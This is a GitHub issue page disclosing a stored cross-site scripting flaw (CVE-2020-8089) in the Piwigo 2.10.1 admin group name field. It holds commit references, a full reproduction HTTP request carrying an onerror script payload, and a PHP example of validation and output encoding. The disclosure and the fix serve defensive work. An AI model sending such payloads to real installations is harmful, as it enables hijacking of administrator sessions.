Stored Cross-Site Scripting vulnerability in Piwigo CMS #1150
Comments
plegall added three commits that referenced this issue on Feb 7, 2020.
I got CVE-2020-8089 assigned for this vulnerability.
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue on May 23, 2020:

Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150
PR: 245153
MFH: 2020Q2
Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by: Netzkommune GmbH
git-svn-id: svn+ssh://svn.freebsd.org/ports/head@536302 35697150-7ecd-e111-bb59-0022644237b5
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue on May 23, 2020:

Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150
PR: 245153
MFH: 2020Q2
Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by: Netzkommune GmbH
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue on May 23, 2020:

Update to 2.10.2
Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150
PR: 245153
Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by: Netzkommune GmbH
Approved by: ports-secteam (with hat)
Jehops pushed a commit to Jehops/freebsd-ports-legacy that referenced this issue on May 23, 2020:

Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150
PR: 245153
MFH: 2020Q2
Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by: Netzkommune GmbH
git-svn-id: svn+ssh://svn.freebsd.org/ports/head@536302 35697150-7ecd-e111-bb59-0022644237b5
PatrickCronin pushed a commit to PatrickCronin/Piwigo that referenced this issue on Jun 10, 2020:

It avoids any stored XSS between administrators and it's totally useless to have HTML code in the group name.
PatrickCronin pushed a commit to PatrickCronin/Piwigo that referenced this issue on Jun 10, 2020.
uqs pushed a commit to freebsd/freebsd-ports that referenced this issue on Apr 1, 2021:

Update to 2.10.2
Changelog:
- https://www.piwigo.org/release-2.10.2
- Piwigo/Piwigo#1150
PR: 245153
Security: 436d7f93-9cf0-11ea-82b8-4c72b94353b5
Sponsored by: Netzkommune GmbH
Approved by: ports-secteam (with hat)
Description:
Piwigo version 2.10.1 is affected by a stored cross-site scripting vulnerability. This vulnerability exists in the "Group Name" field on the "group_list" page.
How to reproduce:
CVSS Score:
CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
POST /piwig/admin.php?page=group_list HTTP/1.1
Host: 172.16.163.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://172.16.163.1
Connection: close
Cookie: pwg_display_thumbnail=no_display_thumbnail; phavsz=1141x490x1; pwg_id=i6juu2ls6m174g1f0abcjodjs7; user_auth=eyJpdiI6IkxnaGp4T0RGd1BiK2VDUzNWNHpRdlE9PSIsInZhbHVlIjoiU29tK1pzdDQzUDBKcWlRZk5VN04wVUNxR1JXUjdBd1Q5QUtOaUJRbUhyNGVjc0xETWUwWFd0RkpBV2ZJOFBKd3R4N2o2clNTRlhWaWtmc2ttQ2dMM3VrWU0rZ1B5cDJlZnpoUGFCZ2hmaHpJTURTVXJQdCtlbEpyeEp6RzhNUVAiLCJtYWMiOiI4YjY2NTU4N2JhOTc2MzkyZTcwOTQyNWQ3OThkNDZkZjMyODgxYjhjZGQ0NGQ2NTFhMjg3NWRmMzM2OGIwZDYzIn0%3D
groupname=%3Cimg+src%3DX+onerror%3Dalert%28document.domain%29%3E&submit_add=Add&pwg_token=46695f2721b77a2840903ba6298796be
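The fix commit referenced above takes the route of keeping HTML out of group names. As an added example (not Piwigo's own code), the PHP below shows that input check beside the output encoding an admin page should apply when rendering stored names, run against the url-decoded `groupname` value from the request above and a harmless name; the function names are assumptions for illustration.

```php
<?php
// Added example, not Piwigo's code: the two defensive layers that close a
// stored XSS in a free-text admin field such as the group name. Function
// names are illustrative assumptions, not Piwigo's API.

// Constructed input: the url-decoded `groupname` value from the request above,
// plus an ordinary name that must keep working.
$samples = ['<img src=X onerror=alert(document.domain)>', 'Family & friends'];

// Layer 1 (input validation): refuse names that carry HTML markup, as the fix
// commit describes ("totally useless to have HTML code in the group name").
// The rule here is deliberately simple: non-empty and no angle brackets.
function group_name_is_clean(string $name): bool
{
    $name = trim($name);
    return $name !== ''
        && strpos($name, '<') === false
        && strpos($name, '>') === false;
}

// Layer 2 (output encoding): encode whatever was stored at the moment it is
// written into HTML, so a value that slipped past validation is shown as text
// rather than parsed as markup. This is what protects the other administrators
// who view the group list.
function render_group_name(string $name): string
{
    return htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

foreach ($samples as $name) {
    $verdict = group_name_is_clean($name) ? 'accepted' : 'rejected (contains HTML)';
    printf("input:    %s\n", $name);
    printf("check:    %s\n", $verdict);
    printf("rendered: %s\n\n", render_group_name($name));
}
```

The payload is rejected at input and, had it already been stored, renders as literal text; the legitimate name passes the check and its ampersand is encoded without altering what the reader sees.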